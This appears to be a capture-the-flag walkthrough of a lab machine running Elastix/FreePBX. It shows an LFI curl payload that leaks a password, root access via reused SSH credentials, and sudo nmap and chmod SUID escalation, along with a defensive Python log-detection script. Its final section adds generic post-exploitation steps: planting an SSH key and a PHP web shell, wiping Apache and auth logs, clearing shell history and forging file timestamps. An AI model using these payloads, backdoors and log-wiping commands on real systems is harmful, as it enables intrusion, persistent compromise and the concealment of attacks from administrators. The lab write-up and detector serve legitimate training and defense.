# Machine Synopsis

IP Address: 10.10.10.7

Key Exploitation Techniques:

- Local File Inclusion (LFI): Exploiting a vulnerability in the `Elastix` web application to read sensitive configuration files.
- SSH Credential Reuse: Using credentials found via LFI to gain a `root` shell via SSH.
- Privilege Escalation: Demonstrating multiple vectors, including `sudo` abuse with `nmap` and `chmod`.
## 1. Enumeration

Initial reconnaissance with `nmap` revealed a wide range of open ports and services.

```bash
nmap -p- --min-rate 10000 10.10.10.7 -oN nmap_portscan.txt
nmap -p 22,25,80,110,143,443,3306,5038,10000 -sC -sV 10.10.10.7 -oN nmap_services.txt
```

### Nmap Results

- Ports 80 & 443 (HTTP/HTTPS): The web server, running `Apache httpd 2.2.3`, redirects to a login page for `Elastix`.
- Port 10000 (HTTP): A `Webmin` service is running on this port, which could be another attack surface.
- Port 3306 (MySQL): Database service is open.
- Port 5038 (Asterisk): The Asterisk Call Manager is available.
- Port 22 (SSH): Running `OpenSSH 4.3`.

Further analysis of the web application showed that the Elastix version is `FreePBX 2.10.0`. This version is known to be vulnerable to several exploits.
## 2. Exploitation: Gaining a Root Shell

### Step 2.1: Local File Inclusion (LFI)

We identified a Local File Inclusion (LFI) vulnerability in the `vtigercrm` component of `Elastix`. This vulnerability allows an attacker to read arbitrary files on the server by manipulating a URL parameter.

The vulnerable URL format is: `https://10.10.10.7/vtigercrm/graph.php?current_language=`.

We used this vulnerability to read the `amportal.conf` file, which is known to contain credentials for the Asterisk application and the database.

```bash
curl -k "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00"
```

The output contained credentials for `AMPDBUSER` and `AMPMGRUSER`:

- AMPDBUSER: `asteriskuser`
- AMPMGRPASS: `jEhdIekWmdjE`
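From the defender's side, the request above leaves a distinctive trace in the Apache access log: a `current_language` value carrying `../` sequences, a `%00` terminator and a sensitive file name. The following detection script is an added example, not part of the original writeup; it parses constructed combined-format log lines (client IPs and timestamps are made up) and flags the traversal pattern, including a double-URL-encoded variant of the same request, which goes beyond the single payload shown on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined-log prefix: client ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252e%252e/) is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(path):
    """Return indicator names for one request path; empty list if nothing is suspicious."""
    indicators = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)
            if "../" in value or "..\\" in value:
                indicators.append(f"traversal:{name}")
            if "\x00" in value:  # the %00 terminator used in the writeup's payload
                indicators.append(f"nullbyte:{name}")
            if re.search(r"/etc/|amportal\.conf|passwd", value):
                indicators.append(f"sensitive-file:{name}")
    return indicators

def scan_log(lines):
    """Return (client_ip, path, indicators) for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (indicators := classify_request(m.group("path"))):
            hits.append((m.group("ip"), m.group("path"), indicators))
    return hits

# Constructed sample lines: a benign request, the writeup's request shape, a double-encoded variant, and an unrelated request.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:07 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    '192.0.2.20 - - [01/Jan/2024:10:01:12 +0000] "GET /vtigercrm/graph.php?current_language=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 1337 "-" "curl/7.88.1"',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]
```

Running `scan_log(SAMPLE_LOG)` returns the two malicious lines with their indicator names; a 200 status on such a request is the signal that the file was actually served.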
### Step 2.2: SSH Access with Credential Reuse

The credentials found in `amportal.conf` are often reused across the system. We tested them against the SSH service on port 22, and they worked.

Note: The SSH client on modern systems may fail to connect because the server only offers outdated cryptographic algorithms. The following command forces the use of a legacy key exchange algorithm and host key type.

```bash
ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
# Enter password: jEhdIekWmdjE
```

After authenticating, we had a `root` shell, bypassing the need for a separate privilege escalation step.

```bash
id
# uid=0(root) gid=0(root) groups=0(root),1(bin),...
```
## 3. Flag Retrieval

With a `root` shell, we located and retrieved both the `user.txt` and `root.txt` flags.

```bash
cat /home/fanis/user.txt
<redacted>
cat /root/root.txt
<redacted>
```
## 4. Alternative Privilege Escalation Methods

In a scenario where initial access is gained as a low-privileged user (e.g., the `asterisk` user via the Asterisk Manager Interface exploit), privilege escalation is necessary. The `sudo -l` command lists the commands a user is allowed to run with `sudo`, including any that require no password.

```bash
sudo -l
```

The output revealed that the `asterisk` user could run several commands as `root` without a password, including `nmap`, `chmod`, and `yum`.
### Method 1: Nmap Interactive Mode

Older versions of `nmap` included an interactive mode that allowed for command execution. If a user can run `nmap` as `root` via `sudo`, they can use this feature to get a root shell.

```bash
sudo nmap --interactive
nmap> !sh
# !sh drops us into a shell.
whoami
# root
```
### Method 2: chmod SUID Abuse

The `sudo` permissions allowed the `asterisk` user to run `chmod` as `root`. We can use this to set the SUID bit on a shell binary like `bash`, which causes it to run with the permissions of its owner (`root`).

```bash
sudo chmod u+s /bin/bash
/bin/bash -p
# The `-p` flag preserves the effective user ID, giving us a root shell.
whoami
# root
```
## 5. Post-Exploitation and Defense Evasion

### Persistence

SSH Key: Add an SSH key for persistent `root` access.

```bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC..." > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
```

Web Shell: Place a simple web shell in a web-accessible directory.

```bash
echo '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' > /var/www/html/backdoor.php
```

### Defense Evasion

Log Cleanup: Clear system and web server logs to remove traces of the initial access and activity.

```bash
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/secure
history -c
```

Timestamp Manipulation: Update timestamps to match existing files.

```bash
touch -r /bin/bash /var/www/html/backdoor.php
```